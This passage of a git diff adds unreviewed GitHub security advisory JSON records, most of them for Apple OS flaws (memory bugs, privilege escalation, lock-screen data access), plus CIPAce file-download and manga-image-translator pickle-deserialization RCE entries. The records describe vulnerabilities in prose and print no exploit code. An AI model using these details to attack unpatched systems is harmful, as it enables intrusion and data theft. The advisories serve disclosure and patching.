"database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json b/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json new file mode 100644 index 0000000000000..76e497aa6e23a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3993-26cm-wfhm", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20645" + ], + "details": "An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20645" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json new file mode 100644 index 0000000000000..007ce1c01c4ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3cgw-cpcx-p7g4", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20618" + ], + "details": "An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Tahoe 26.3. An app may be able to access user-sensitive data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20618" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json b/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json new file mode 100644 index 0000000000000..b14895c53e16e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fcr-xq7p-rffp", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2024-50617" + ], + "details": "Vulnerabilities in the File Download and Get File handler components in CIPPlanner CIPAce before 9.17 allow attackers to download unauthorized files. An authenticated user can easily change the file id parameter or pass the physical file path in the URL query string to retrieve the files. (Retrieval is not intended without correct data access configured for documents.)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50617" + }, + { + "type": "WEB", + "url": "https://cipplanner.com/cve-2024-50617-cve-public-notification-of-resolution" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T22:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json b/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json new file mode 100644 index 0000000000000..dbba53d30536e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3frw-32pg-5m86", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-20611" + ], + "details": "An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20611" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3jj8-9qpj-6989/GHSA-3jj8-9qpj-6989.json b/advisories/unreviewed/2026/02/GHSA-3jj8-9qpj-6989/GHSA-3jj8-9qpj-6989.json new file mode 100644 index 0000000000000..17afd90670925 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3jj8-9qpj-6989/GHSA-3jj8-9qpj-6989.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jj8-9qpj-6989", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20620" + ], + "details": "An out-of-bounds read issue was addressed with improved input validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An attacker may be able to cause unexpected system termination or read kernel memory.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20620" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json b/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json new file mode 100644 index 0000000000000..6840bc4a034b2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3p5c-6wpr-gh3w", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20682" + ], + "details": "A logic issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker may be able to discover a user’s deleted notes.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20682" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json new file mode 100644 index 0000000000000..3399a40c08ba8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qr2-wf7p-c9f8", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20671" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker in a privileged network position may be able to intercept network traffic.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20671" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json b/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json new file mode 100644 index 0000000000000..ea4d2fc54dead --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ww4-528c-xcv7", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20630" + ], + "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20630" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json new file mode 100644 index 0000000000000..c9a3d93f490a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m8q-p6h8-x2wj", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20654" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20654" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4q59-wccf-6q9r/GHSA-4q59-wccf-6q9r.json b/advisories/unreviewed/2026/02/GHSA-4q59-wccf-6q9r/GHSA-4q59-wccf-6q9r.json new file mode 100644 index 0000000000000..47c2788dea465 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4q59-wccf-6q9r/GHSA-4q59-wccf-6q9r.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q59-wccf-6q9r", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20617" + ], + "details": "A race condition was addressed with improved state handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20617" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json b/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json new file mode 100644 index 0000000000000..45b2b79f20cef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fwp-233p-3m7m", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20650" + ], + "details": "A denial-of-service issue was addressed with improved validation. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Bluetooth packets.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20650" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json b/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json new file mode 100644 index 0000000000000..2534b75a42087 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-649p-9q32-vwxc", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20647" + ], + "details": "This issue was addressed with improved data protection. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20647" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6cwx-3f6w-m5ch/GHSA-6cwx-3f6w-m5ch.json b/advisories/unreviewed/2026/02/GHSA-6cwx-3f6w-m5ch/GHSA-6cwx-3f6w-m5ch.json new file mode 100644 index 0000000000000..ea083b74166cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6cwx-3f6w-m5ch/GHSA-6cwx-3f6w-m5ch.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6cwx-3f6w-m5ch", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-26215" + ], + "details": "manga-image-translator version beta-0.3 and prior in shared API mode contains an unsafe deserialization vulnerability that can lead to unauthenticated remote code execution. The FastAPI endpoints /simple_execute/{method} and /execute/{method} deserialize attacker-controlled request bodies using pickle.loads() without validation. Although a nonce-based authorization check is intended to restrict access, the nonce defaults to an empty string and the check is skipped, allowing remote attackers to execute arbitrary code in the server context by sending a crafted pickle payload.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26215" + }, + { + "type": "WEB", + "url": "https://github.com/zyddnys/manga-image-translator/issues/1116" + }, + { + "type": "WEB", + "url": "https://github.com/zyddnys/manga-image-translator/issues/946" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/manga-image-translator-pickle-rce" + }, + { + "type": "WEB", + "url": "https://github.com/zyddnys/manga-image-translator/blob/a537cb12b41daf2065795058c2753d87e73fa0fe/manga_translator/mode/share.py#L112" + }, + { + "type": "WEB", + "url": "https://github.com/zyddnys/manga-image-translator/blob/a537cb12b41daf2065795058c2753d87e73fa0fe/manga_translator/mode/share.py#L130" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/manga-image-translator-shared-api-unsafe-deserialization-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json new file mode 100644 index 0000000000000..ff2941966e5a9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6jg9-x4w8-gj7j", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20642" + ], + "details": "An input validation issue was addressed. This issue is fixed in iOS 26.3 and iPadOS 26.3. A person with physical access to an iOS device may be able to access photos from the lock screen.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20642" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrf-46c8-4wmj/GHSA-6xrf-46c8-4wmj.json b/advisories/unreviewed/2026/02/GHSA-6xrf-46c8-4wmj/GHSA-6xrf-46c8-4wmj.json new file mode 100644 index 0000000000000..4ac75e1f8acfb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6xrf-46c8-4wmj/GHSA-6xrf-46c8-4wmj.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xrf-46c8-4wmj", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20616" + ], + "details": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3. Processing a maliciously crafted USD file may lead to unexpected app termination.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20616" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json b/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json new file mode 100644 index 0000000000000..cd44cb75c296a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74vw-h65p-vr44", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20673" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Tahoe 26.3, macOS Sonoma 14.8.4. Turning off \"Load remote content in messages” may not apply to all mail previews.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20673" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-82p2-ccrf-wxw5/GHSA-82p2-ccrf-wxw5.json b/advisories/unreviewed/2026/02/GHSA-82p2-ccrf-wxw5/GHSA-82p2-ccrf-wxw5.json new file mode 100644 index 0000000000000..274f28eb1042b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-82p2-ccrf-wxw5/GHSA-82p2-ccrf-wxw5.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82p2-ccrf-wxw5", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20615" + ], + "details": "A path handling issue was addressed with improved validation. This issue is fixed in iOS 26.3 and iPadOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3. An app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20615" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json b/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json new file mode 100644 index 0000000000000..8e62de53e626f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-84wm-58x3-8fvc", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20666" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20666" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json b/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json new file mode 100644 index 0000000000000..99c6031967172 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8cmp-jqmx-pj7w", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20605" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to crash a system process.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20605" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json new file mode 100644 index 0000000000000..f074b5365ed5c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xrx-9wj4-6775", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20649" + ], + "details": "A logging issue was addressed with improved data redaction. This issue is fixed in watchOS 26.3, iOS 26.3 and iPadOS 26.3, tvOS 26.3, macOS Tahoe 26.3. A user may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20649" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json b/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json new file mode 100644 index 0000000000000..540615e7debfc --- 